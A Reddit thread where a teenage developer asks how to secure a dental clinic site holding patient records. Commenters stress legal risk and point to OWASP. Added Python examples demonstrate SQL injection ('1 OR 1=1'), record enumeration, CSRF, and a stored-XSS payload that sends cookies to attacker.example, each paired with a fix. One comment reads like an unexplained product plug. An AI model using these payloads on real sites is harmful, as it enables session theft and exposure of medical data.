How to make my website secure?
Posted by Far_Contact1146@reddit | learnprogramming | 29 comments
I'm making a dental clinic website for my client. How would I prevent data from being leaked or stolen by hackers, basically? Would encryption, running it on Railway, and whitelisting IP addresses be enough? Any other possible way?
_malaikatmaut_@reddit
Please tell us which clinic that is so we can avoid having our data stolen.
Far_Contact1146@reddit (OP)
ahahahaha mbb but any tips?
HealyUnit@reddit
You seriously seem to be stupid enough to think we're joking. We're not. For once, please, listen to people with experience. This isn't AHAHAA MY BAD LOL JK. This is people's medical information we're talking about. You will get sued if not in more legal trouble when you inadvertently leak information.
But hey, I'm sure laughing to the judge and going "HAHA GUYS WOOPS" is really gonna make everything okay, right?
Far_Contact1146@reddit (OP)
okay okay mb
NoSteak1123@reddit
That’s a huge step up! Moving from resorts to medical/dental is definitely where the security details start to matter a ton more. Encryption and whitelisting are great starts, but I actually switched over to Osto for my own sites and it’s been superb. It takes a lot of the manual 'worry' out of the process and feels way more robust for sensitive data. Good luck with the build, your client is lucky to have someone taking this so seriously!
HealyUnit@reddit
I'm sorry, have you read the rest of this guy's replies? Taking this seriously is not even in the same universe.
Far_Contact1146@reddit (OP)
Also, can I ask what Osto does? And the pricing?
Far_Contact1146@reddit (OP)
TYY SM
VibrantGypsyDildo@reddit
Too wide a topic; just read books on fundamentals. I wonder if they are covered in the FAQ section.
If you don't read the FAQ, please be aware of SQL injection. Or basic authentication. Or randomizing user IDs, or not using birth years as a password by default.
With a simple script, back in the day, I saw who had problems with their prostate (generally considered a private thing) in one particular clinic.
Please don't be the next dev who exposes data like this.
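The two bugs behind the "simple script" story above are an injectable query and a guessable record ID with no ownership check. The following is an added example, not code from anyone in the thread: a vulnerable lookup next to a hardened one, on a constructed in-memory SQLite table with made-up patients. The `owner` column (a per-clinic tenant) and the `public_id` token are assumptions introduced for the illustration.

```python
"""Added example: SQL injection plus enumerable record IDs, and the fix.

Standard library only (sqlite3 + secrets). All patient rows below are
constructed for the example and are not real data.
"""
import secrets
import sqlite3

# Constructed sample records. 'owner' is the clinic account allowed to
# read the record (hypothetical tenant model for the example).
SAMPLE_PATIENTS = [
    ("clinic_a", "Alice", "prostate follow-up"),
    ("clinic_a", "Bob", "routine cleaning"),
    ("clinic_b", "Carol", "root canal"),
]


def make_db() -> sqlite3.Connection:
    """In-memory table with a sequential id AND an unguessable public_id."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE patients ("
        " id INTEGER PRIMARY KEY,"          # sequential: trivially enumerable
        " public_id TEXT UNIQUE NOT NULL,"  # random: the only id URLs should carry
        " owner TEXT NOT NULL,"
        " name TEXT NOT NULL,"
        " notes TEXT NOT NULL)"
    )
    for owner, name, notes in SAMPLE_PATIENTS:
        conn.execute(
            "INSERT INTO patients (public_id, owner, name, notes) VALUES (?, ?, ?, ?)",
            (secrets.token_urlsafe(16), owner, name, notes),  # 128-bit random id
        )
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, patient_id: str) -> list:
    """VULNERABLE: string-built SQL, sequential id, no ownership check.

    patient_id="1 OR 1=1" returns every row; patient_id="2" returns someone
    else's record with no questions asked.
    """
    sql = f"SELECT name, notes FROM patients WHERE id = {patient_id}"
    return conn.execute(sql).fetchall()


def enumerate_records(conn: sqlite3.Connection, ids) -> list:
    """What the 'simple script' did: walk candidate ids, keep whatever comes back."""
    return [row for i in ids for row in vulnerable_lookup(conn, str(i))]


def safe_lookup(conn: sqlite3.Connection, public_id: str, requester: str) -> list:
    """HARDENED: parameterised query, random public id, authorisation in the WHERE.

    The bound parameter is never interpreted as SQL, the id space is too large
    to walk, and a record is returned only to the clinic that owns it.
    """
    sql = "SELECT name, notes FROM patients WHERE public_id = ? AND owner = ?"
    return conn.execute(sql, (public_id, requester)).fetchall()


def public_id_for(conn: sqlite3.Connection, name: str) -> str:
    """Helper for the demo: the random id a legitimate link would contain."""
    return conn.execute(
        "SELECT public_id FROM patients WHERE name = ?", (name,)
    ).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("injection:", vulnerable_lookup(db, "1 OR 1=1"))          # all three rows
    print("enumeration:", enumerate_records(db, range(1, 4)))       # all three rows
    pid = public_id_for(db, "Alice")
    print("owner:", safe_lookup(db, pid, "clinic_a"))               # Alice only
    print("other clinic:", safe_lookup(db, pid, "clinic_b"))        # []
```

Note that the hardened version needs all three changes together: parameters alone still let an authenticated user request `?id=2`, and random ids alone are only as secret as the links they appear in, so the ownership check stays in the query.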
Far_Contact1146@reddit (OP)
dw im making sure of everything
nomoreplsthx@reddit
Where are you located, and are you storing personal info, health info, or payment data?
There are serious legal implications to messing this up in many jurisdictions. Like 'life ruining' legal implications.
The moment you start collecting personal information, you become legally liable if it is stolen. The legal system doesn't take 'I'm 16, go easy' as an excuse, generally.
Far_Contact1146@reddit (OP)
I'm located in the Philippines, and I'm storing general information like name, address, dental records, and the dental charting.
teraflop@reddit
Sorry to be blunt, but if you're asking such a broad question, I suspect you're not yet knowledgeable enough to be able to responsibly do a project like this.
Encryption of data in transit (i.e. HTTPS) is absolutely critical, but it is not enough to make your site secure, because there are all kinds of ways a hacker can get data besides just intercepting it on the wire.
This is a good defense-in-depth measure, if you can deal with the usability tradeoff of having to manage the whitelist. It's not perfect and you shouldn't rely on it. In particular, it does very little to stop targeted XSS or CSRF attacks.
Using a trustworthy hosting provider is necessary, but again, far from sufficient. I don't have any particular opinion about Railway in general.
You've basically only talked about the security of your network and hosting infrastructure, but not the security of the software you're creating, which is a huge potential source of vulnerabilities. Take a look at the OWASP Top Ten and the more detailed list of attacks for a sampling of the kinds of things that can go wrong. You must be very diligent and careful to avoid all of these vulnerabilities if you want your system to be secure.
And bear in mind that to some extent, security depends on users. No matter how securely you make your webapp, it won't help if your users have keyloggers installed on their machines, or if they get tricked into typing their passwords into a phishing page.
Also, bear in mind that healthcare is often covered by regulations. For instance, in the United States, healthcare organizations (including their software) are covered by HIPAA which includes security and privacy rules. It's not enough to just say that your software is secure. You also need to have documented processes and technical security infrastructure to detect security breaches if they happen, so that you can comply with your legal obligation to notify the affected users.
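The comment above makes the point that an IP whitelist does little against XSS or CSRF: the forged request arrives from the dentist's own (whitelisted) browser, carrying the dentist's own session cookie. The following is an added example, not code from the commenter or from any framework: a minimal simulation of a "save dental notes" handler, with a CSRF token bound to the session via HMAC and HTML escaping of stored notes, showing which check actually stops each attack. The request/session shapes, the `SECRET_KEY` and the IP addresses are constructed for the illustration.

```python
"""Added example: why an IP allowlist does not stop CSRF or XSS.

Standard library only (hmac, hashlib, html, secrets). The request and
session objects are plain dicts standing in for a web framework's.
"""
import hashlib
import hmac
import html
import secrets

# Hypothetical server-side secret; a real deployment loads it from config.
SECRET_KEY = secrets.token_bytes(32)

# Constructed allowlist: the clinic's office IP (TEST-NET range).
CLINIC_ALLOWLIST = {"203.0.113.5"}


def csrf_token(session_id: str) -> str:
    """Token bound to the session: only a page served to this session can know it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_valid(session_id: str, presented: str) -> bool:
    """Constant-time comparison, so the check does not leak via timing."""
    return hmac.compare_digest(csrf_token(session_id), presented)


def handle_save_notes(request: dict, allowlist: set, check_csrf: bool) -> int:
    """Return an HTTP status for a POST that updates a patient's notes.

    request = {"ip": str, "session_id": str, "form": {"notes": str, "csrf"?: str}}
    With check_csrf=False this is the allowlist-only design from the thread.
    """
    if request["ip"] not in allowlist:
        return 403                      # stops strangers, not the dentist's browser
    if check_csrf and not csrf_valid(request["session_id"], request["form"].get("csrf", "")):
        return 403                      # stops a cross-site forged POST
    return 200


def forged_request(session_id: str) -> dict:
    """A CSRF attack: evil site auto-submits a form from the dentist's browser.

    The browser attaches the session cookie and sends from the office IP, but
    the attacker cannot read the token embedded in the real page.
    """
    return {"ip": "203.0.113.5", "session_id": session_id,
            "form": {"notes": "patient no-showed, bill anyway"}}


def legitimate_request(session_id: str, notes: str) -> dict:
    """The real form, which carried the token the server rendered into it."""
    return {"ip": "203.0.113.5", "session_id": session_id,
            "form": {"notes": notes, "csrf": csrf_token(session_id)}}


def render_notes_vulnerable(notes: str) -> str:
    """VULNERABLE: stored text goes into HTML verbatim (stored XSS)."""
    return f"<p>{notes}</p>"


def render_notes_safe(notes: str) -> str:
    """HARDENED: output encoding turns markup into inert text."""
    return f"<p>{html.escape(notes)}</p>"


if __name__ == "__main__":
    sid = "dentist-session-1"
    print("forged, allowlist only:", handle_save_notes(forged_request(sid), CLINIC_ALLOWLIST, False))  # 200
    print("forged, with CSRF check:", handle_save_notes(forged_request(sid), CLINIC_ALLOWLIST, True))  # 403
    payload = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
    print(render_notes_vulnerable(payload))
    print(render_notes_safe(payload))
```

The allowlist-only handler accepts the forged request with 200 because, from the server's point of view, it is indistinguishable from the dentist clicking Save; only the per-session token separates the two. The same logic applies to XSS: a script injected into a patient note runs in the whitelisted browser, so escaping on output (or a templating engine that does it by default) is what protects the data, not the network layer.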
dylantrain2014@reddit
Please provide some more information on the website. Does this site have a backend? Is sensitive or HIPAA protected information going to be accessed or stored?
Does the dental clinic have any existing data? Are you the only developer on this project?
Far_Contact1146@reddit (OP)
Yes, I'm the only dev on this project, and go easy on me, I'm 16 hehe. It does have a backend.
dylantrain2014@reddit
What type of information is being stored in the backend?
Far_Contact1146@reddit (OP)
Basic information like name, age, address, dental records, and the dental chart.
dkopgerpgdolfg@reddit
Then, for most jurisdictions, a sane 16-year-old self-taught programmer will stop right there, to avoid being in deep sh*
dylantrain2014@reddit
What country does the clinic reside in and/or will the site be hosted in?
Far_Contact1146@reddit (OP)
Philippines bro
dylantrain2014@reddit
In that case, all comments about HIPAA can be ignored. That said, the Philippines has its own set of laws surrounding sensitive healthcare information. Realistically speaking, to implement any kind of electronic storage for healthcare records is going to require a team of more than one person.
At minimum, you need 2 people for this kind of thing: someone to write the code (you!) and someone to handle the security and compliance elements of the project. Legally, you also need a Data Protection Officer.
This project would also need long-term support. No healthcare information system can go without active monitoring and maintenance. You could technically pass off that maintenance work to someone else, but it’s not really practical to do so.
Hosting this locally does not change anything besides a bit less paperwork with respect to cloud providers.
The actual security features aren’t anything special (they coincide with good practice for any operational Internet facing application), but they’re significant enough that you’d need someone whose only job is implementing and validating them.
Far_Contact1146@reddit (OP)
Would it be possible to do it as one person? My clients aren't big clinics either, and I'm not aiming for them; it's just for small dental clinics. But what would I need to execute this on my own, because I don't have the money to get more people or someone to do maintenance?
dylantrain2014@reddit
Assuming you didn’t care about the legal aspect, I think it’d be possible from a technical standpoint. You can look up what data and security requirements exist. They’re described in great detail.
You definitely won’t have a particularly robust system, nor one that can realistically be considered secure. If the clinic has enough patients that they need this kind of software, they should really just look for an existing vendor who can take legal responsibility.
HealyUnit@reddit
Sorry, but no. Not because I wanna be an ass, but because this is security we're talking about. This isn't an "Ah, well, OP tried! Whoops!" kinda deal. You're dealing with personally identifiable information (PII) and maybe personal health information (PHI).
There are some very serious laws covering these - the Health Insurance Portability and Accountability Act (HIPAA), state "breach" laws that basically require the maintainer of said information to notify any affected party if their information is leaked for any reason, and others - that mean you do not mess around with personal information.
If you're not in the US, simply Google "personal information laws".
You should be scared.
Far_Contact1146@reddit (OP)
okay okayy mbmb
Any-Range9932@reddit
HIPAA compliance would make this extremely hard, unless the dental clinic wants to get sued if data gets leaked. Is this US-based?
AardvarkIll6079@reddit
You have much bigger things to worry about. There’s a whole lot to being HIPAA compliant. No offense, OP, but you’re in way over your head. Do not take this job. You’re asking for legal trouble.
Far_Contact1146@reddit (OP)
Gah damn, what if I made things run locally?
oblong_pickle@reddit
This is a huge question, and you haven't provided anywhere near enough details.
OWASP has some good info to get started, but it's very dense (there is a lot of it):
https://owasp.org/Top10/2025/
https://github.com/OWASP/CheatSheetSeries